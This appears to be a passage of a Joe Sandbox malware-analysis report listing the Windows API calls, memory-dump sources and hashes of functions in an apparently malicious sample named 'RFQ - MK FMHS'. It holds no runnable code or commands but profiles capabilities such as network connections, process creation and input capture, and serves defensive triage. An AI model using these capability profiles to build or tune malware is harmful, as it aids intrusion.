                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EA64DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: d89ec1ffdbb564f5c5c438bd5a73b83dce64f18941a6f4a14556ac9722f096a6
                    • Instruction ID: 7a9fd5dfb8c7974e9094022d84befd829e84b87d98160a20e7e789599dce6f10
                    • Opcode Fuzzy Hash: d89ec1ffdbb564f5c5c438bd5a73b83dce64f18941a6f4a14556ac9722f096a6
                    • Instruction Fuzzy Hash: 3B31DE31600246AFDF218F75C844BBA7BE9FF4F314F195069E864AB1A1EB31E850DB90
                    APIs
                    • GetForegroundWindow.USER32 ref: 00EF5189
                      • Part of subcall function 00ED387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ED3897
                      • Part of subcall function 00ED387D: GetCurrentThreadId.KERNEL32 ref: 00ED389E
                      • Part of subcall function 00ED387D: AttachThreadInput.USER32(00000000,?,00ED52A7), ref: 00ED38A5
                    • GetCaretPos.USER32(?), ref: 00EF519A
                    • ClientToScreen.USER32(00000000,?), ref: 00EF51D5
                    • GetForegroundWindow.USER32 ref: 00EF51DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: 7328002ba56645c8fac3af58f4fce0d797d4e7c005e6939a4e10b9815634ad29
                    • Instruction ID: 64c93eb1a0fd2c2dba7dccfbc5ad5d119c159d34d922afe43d95a35406d2a77d
                    • Opcode Fuzzy Hash: 7328002ba56645c8fac3af58f4fce0d797d4e7c005e6939a4e10b9815634ad29
                    • Instruction Fuzzy Hash: 99310C72901108AFDB04EFA5C8859EFB7F9EF98300F10906AE515F7252EA759E05CBA1
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • GetCursorPos.USER32(?), ref: 00EFC7C2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EABBFB,?,?,?,?,?), ref: 00EFC7D7
                    • GetCursorPos.USER32(?), ref: 00EFC824
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EABBFB,?,?,?), ref: 00EFC85E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    • Opcode ID: fc42499594ba4e0c1ccedbc739c396a3e8308bf62a0533941426ebe399e594fe
                    • Instruction ID: 466ffcb6a52cc7d55ecb3547a27d190996ef5a30557471dbca990ebdcf310f42
                    • Opcode Fuzzy Hash: fc42499594ba4e0c1ccedbc739c396a3e8308bf62a0533941426ebe399e594fe
                    • Instruction Fuzzy Hash: 5931713560005CAFCB15CF59C898EFA7BB6EF49364F248069FA05AB261C731AD50EB60
                    APIs
                    • __setmode.LIBCMT ref: 00E90BF2
                      • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7B20,?,?,00000000), ref: 00E75B8C
                      • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7B20,?,?,00000000,?,?), ref: 00E75BB0
                    • _fprintf.LIBCMT ref: 00E90C29
                    • OutputDebugStringW.KERNEL32(?), ref: 00EC6331
                      • Part of subcall function 00E94CDA: _flsall.LIBCMT ref: 00E94CF3
                    • __setmode.LIBCMT ref: 00E90C5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: c2f448d0d28ca398795d23931d7291e2d81ae90d3a6bd1da6f428469a6adcb08
                    • Instruction ID: f4986c94511f50cac90c6a1834a87067a4a3c5ee19228429b6b156232ed49d9b
                    • Opcode Fuzzy Hash: c2f448d0d28ca398795d23931d7291e2d81ae90d3a6bd1da6f428469a6adcb08
                    • Instruction Fuzzy Hash: 391127B29042087EDF04B3B49C42DBEBBE9DF85320F14611AF108772D2DE615D479395
                    APIs
                       • Part of subcall function 00EC8652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00EC8669
                       • Part of subcall function 00EC8652: GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00EC8673
                       • Part of subcall function 00EC8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00EC8682
                       • Part of subcall function 00EC8652: HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 00EC8689
                       • Part of subcall function 00EC8652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00EC869F
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00EC8BEB
                    • _memcmp.LIBCMT ref: 00EC8C0E
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC8C44
                    • HeapFree.KERNEL32(00000000), ref: 00EC8C4B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 1592001646-0
                    • Opcode ID: 2b4707893a1d2ee40101e5bbbf11f6f5c847618e33f36e2b52ac243cb8d11618
                    • Instruction ID: 8cf7e3e6f6d5772c81ab074cac21265e4f679f0415cfe5236c66d3d1a92c83b1
                    • Opcode Fuzzy Hash: 2b4707893a1d2ee40101e5bbbf11f6f5c847618e33f36e2b52ac243cb8d11618
                    • Instruction Fuzzy Hash: 87218972E02208AFCB00CFA4CB44FEEB7B8EF50345F044099E454B7241DB32AA06CB61
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EE1A97
                      • Part of subcall function 00EE1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EE1B40
                      • Part of subcall function 00EE1B21: InternetCloseHandle.WININET(00000000), ref: 00EE1BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 25172bf6bf734683b7fe02eea4a9d2fbe3141055afd5b2f6f01b9a1cfcb58194
                    • Instruction ID: 185d456bd715a15d2f5769c6638c5e3889e89623a03b266c119d5b459b802510
                    • Opcode Fuzzy Hash: 25172bf6bf734683b7fe02eea4a9d2fbe3141055afd5b2f6f01b9a1cfcb58194
                    • Instruction Fuzzy Hash: 84219235200649FFDB119F628C01FBAB7ADFF84701F10105EFA15A6690E771A855D790
                    APIs
                      • Part of subcall function 00ECF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00ECE1C4,?,?,?,00ECEFB7,00000000,000000EF,00000119,?,?), ref: 00ECF5BC
                      • Part of subcall function 00ECF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00ECF5E2
                      • Part of subcall function 00ECF5AD: lstrcmpiW.KERNEL32(00000000,?,00ECE1C4,?,?,?,00ECEFB7,00000000,000000EF,00000119,?,?), ref: 00ECF613
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00ECEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00ECE1DD
                    • lstrcpyW.KERNEL32(00000000,?), ref: 00ECE203
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00ECEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00ECE237
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    • Opcode ID: 3760bc1cd6c3043dca8cd58e0a97f183e556e51002cf7f3ef2c84068fe4483cf
                    • Instruction ID: 91644fd818fba730444dac160a2afa4f513a8cb1637538fdbc3f8df09815e3c0
                    • Opcode Fuzzy Hash: 3760bc1cd6c3043dca8cd58e0a97f183e556e51002cf7f3ef2c84068fe4483cf
                    • Instruction Fuzzy Hash: 3711BE36200301EFCB29AF64D945F7A77A9FF84350B40602AF906DB260EB729852D7A0
                    APIs
                    • _free.LIBCMT ref: 00EA5351
                      • Part of subcall function 00E9594C: __FF_MSGBANNER.LIBCMT ref: 00E95963
                      • Part of subcall function 00E9594C: __NMSG_WRITE.LIBCMT ref: 00E9596A
                      • Part of subcall function 00E9594C: RtlAllocateHeap.NTDLL(014A0000,00000000,00000001,00000000,?,?,?,00E91013,?), ref: 00E9598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 8691bc0a69dd74b502e9288605ff2df4fd5eebba1dee114a3990749337b86584
                    • Instruction ID: 337e2544accc0a90beb4fedd72d7961bb8664d80515dfe2537dde9d8111a241c
                    • Opcode Fuzzy Hash: 8691bc0a69dd74b502e9288605ff2df4fd5eebba1dee114a3990749337b86584
                    • Instruction Fuzzy Hash: B4112333505A15AFCF312F70AC0066E37D89F9A3A4B10242AF944BE1A0DEB1A9448790
                    APIs
                    • _memset.LIBCMT ref: 00E74560
                      • Part of subcall function 00E7410D: _memset.LIBCMT ref: 00E7418D
                      • Part of subcall function 00E7410D: _wcscpy.LIBCMT ref: 00E741E1
                      • Part of subcall function 00E7410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E741F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 00E745B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E745C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EAD6CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: 7f60aebdc31c54f33f284934e4770531ff253c701d8ad8fc1df50262825c644d
                    • Instruction ID: 1780074d5415f6a2acb917b3103000da1cd7d1b844c5bdb3fa9dd1299542ca70
                    • Opcode Fuzzy Hash: 7f60aebdc31c54f33f284934e4770531ff253c701d8ad8fc1df50262825c644d
                    • Instruction Fuzzy Hash: 6A21FCB0508784AFEB329B24DC45BE7BFEC9F45308F04509EE69E7A181C7746A84DB51
                    APIs
                      • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7B20,?,?,00000000), ref: 00E75B8C
                      • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7B20,?,?,00000000,?,?), ref: 00E75BB0
                    • gethostbyname.WSOCK32(?), ref: 00EE66AC
                    • WSAGetLastError.WSOCK32(00000000), ref: 00EE66B7
                    • _memmove.LIBCMT ref: 00EE66E4
                    • inet_ntoa.WSOCK32(?), ref: 00EE66EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: 0303fad97039042827f74097aad0545cf3a9985c41e373d1c516b806e77e0a26
                    • Instruction ID: 9deeabf45fc551a76e666c7953e4fb3df0e9dc96f33d005f903dc2f944e54f0d
                    • Opcode Fuzzy Hash: 0303fad97039042827f74097aad0545cf3a9985c41e373d1c516b806e77e0a26
                    • Instruction Fuzzy Hash: 9B118E36900509AFCB04EBA1DD86DEEB7F8EF58310B049065F50AB7262DF70AE04CB61
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00EC9043
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC9055
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC906B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC9086
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 3e269a167c33d709a64c6ae134723d070616f39ff1114c7af6c8365e1af00abe
                    • Instruction ID: 52a5a02fb82f12a5797edcb8fa21fd6a16721776abbb8dcbe1b8658bb3c4ed20
                    • Opcode Fuzzy Hash: 3e269a167c33d709a64c6ae134723d070616f39ff1114c7af6c8365e1af00abe
                    • Instruction Fuzzy Hash: 65114C79900218FFDB10DFA5C985FADBBB4FB48310F204095E904B7290D6726E11DB94
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • DefDlgProcW.USER32(?,00000020,?), ref: 00E712D8
                    • GetClientRect.USER32(?,?), ref: 00EAB84B
                    • GetCursorPos.USER32(?), ref: 00EAB855
                    • ScreenToClient.USER32(?,?), ref: 00EAB860
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: 2dc1c2ffefbe74a0de2966e4130eff57aeebe44bfad97bf170b6853459a31d47
                    • Instruction ID: 4a490ae2f993cd366a2e0a8bb42f429d662c0529e8e852a8fe77329bcabbf0b4
                    • Opcode Fuzzy Hash: 2dc1c2ffefbe74a0de2966e4130eff57aeebe44bfad97bf170b6853459a31d47
                    • Instruction Fuzzy Hash: C4111935900159AFCB00DF98D8859FE77B8EF45300F408496F905F7252CB30AA55EBA5
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED166F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED1694
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED169E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00ED01FD,?,00ED1250,?,00008000), ref: 00ED16D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: c3f4d8bea01cf75f9dcb0b87a0b1f85050db9f3b65b00fb0c19446f07dccebc4
                    • Instruction ID: 7787cb41bfc8abcf4d1cc1ea3798e7168670c49fa9eb33abc197964a1bd2bcd3
                    • Opcode Fuzzy Hash: c3f4d8bea01cf75f9dcb0b87a0b1f85050db9f3b65b00fb0c19446f07dccebc4
                    • Instruction Fuzzy Hash: 6A113931C0152DEBCF009FE6D948AFEBB78FF49751F45509AEA50B6240CB3095A2CB96
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: b6136a95f5af23fce13b0d06fae1371f4983b149cda7ecbe25758cad142063ba
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 3E01807204414ABBCF129E84CC019EE3F66BF5E345F099515FA9868031D337E9B1AB91
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00EFB59E
                    • ScreenToClient.USER32(?,?), ref: 00EFB5B6
                    • ScreenToClient.USER32(?,?), ref: 00EFB5DA
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EFB5F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: 02d7ca1ac576cf99237dcbcaf3055109b60d61fd48a830689e58217d8d16703c
                    • Instruction ID: b19c38172bd36888543a3bc6f84a316730175087f2c69ae39602146f3663dfad
                    • Opcode Fuzzy Hash: 02d7ca1ac576cf99237dcbcaf3055109b60d61fd48a830689e58217d8d16703c
                    • Instruction Fuzzy Hash: 931134B9D00209EFDB41CF99C4849EEBBB5FF48310F504166E915E2220D735AA55CF91
                    APIs
                    • _memset.LIBCMT ref: 00EFB8FE
                    • _memset.LIBCMT ref: 00EFB90D
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F37F20,00F37F64), ref: 00EFB93C
                    • CloseHandle.KERNEL32 ref: 00EFB94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3277943733-0
                    • Opcode ID: 01e212e58b7872c9ccd7f0fe0ab97a4583fbcf390118b019a36fddf1e6f4c8e9
                    • Instruction ID: 83cf1456cf1aec3a6931ed2d78d6a75e202fc71439b4b5ae50c3f8b11118d16e
                    • Opcode Fuzzy Hash: 01e212e58b7872c9ccd7f0fe0ab97a4583fbcf390118b019a36fddf1e6f4c8e9
                    • Instruction Fuzzy Hash: 71F0DAF2544318BBE6203775AC05FBB7A9DEB09764F005021FA08E5192D7755910D7E8
                    APIs
                    • EnterCriticalSection.KERNEL32(?), ref: 00ED6E88
                      • Part of subcall function 00ED794E: _memset.LIBCMT ref: 00ED7983
                    • _memmove.LIBCMT ref: 00ED6EAB
                    • _memset.LIBCMT ref: 00ED6EB8
                    • LeaveCriticalSection.KERNEL32(?), ref: 00ED6EC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
